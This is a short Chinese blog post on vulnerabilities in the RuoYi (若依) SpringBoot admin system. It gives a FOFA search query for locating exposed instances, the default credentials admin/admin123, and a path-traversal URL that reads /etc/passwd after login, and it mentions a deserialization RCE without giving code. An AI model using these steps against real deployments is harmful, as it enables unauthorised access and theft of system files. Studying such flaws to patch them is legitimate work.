若依框架漏洞(若依管理系统漏洞)
2023-09-11 14:19:27 时间
若依管理系统是基于SpringBoot的权限管理系统,若依框架漏洞推荐使用zhzy的vulmap工具查看。
1.早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令
漏洞复现
祭出fofa大法,fofa语法如下
app="若依-管理系统" && body="admin"
利用工具检测漏洞 这里不提供,太多了,推荐使用zhzy的vulmap 
利用poc执行任意命令
2后台登录若依管理系统后可以任意读取文件
登陆后访问 (默认弱口令 admin admin123)
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
读取 passwd
相关文章
- 文件解析漏洞总结
- 缓冲区溢出漏洞攻击原理
- 2022年十大漏洞扫描工具
- dedecmsV5.7 任意文件上传漏洞修复
- 文件上传漏洞详解
- CVE-2019-11043(PHP远程代码执行漏洞)复现
- Android提权漏洞CVE-2014-7920&CVE-2014-7921分析
- 详解CVE-2022-0847 DirtyPipe漏洞
- Spring 官方证实:框架爆大漏洞,JDK 9 及以上版本均受影响
- 中职网络安全竞赛之应用服务漏洞扫描与利用
- 人类因素:网络安全的最大漏洞?
- (墨者学院)-主机溢出提权漏洞分析
- windows漏洞扫描工具-windowsvulnscan和wesng,本质是比较windows系统版本、systeminfo补丁信息来查看漏洞利用情况,EDR可以用;提权的话通常是系统内核溢出漏洞来提权,见内网安全攻防
- WEB漏洞攻防 - SQL注入 - 堆叠注入
- WEB漏洞攻防 - 文件上传漏洞 - CTF - [极客大挑战 2019]Upload-1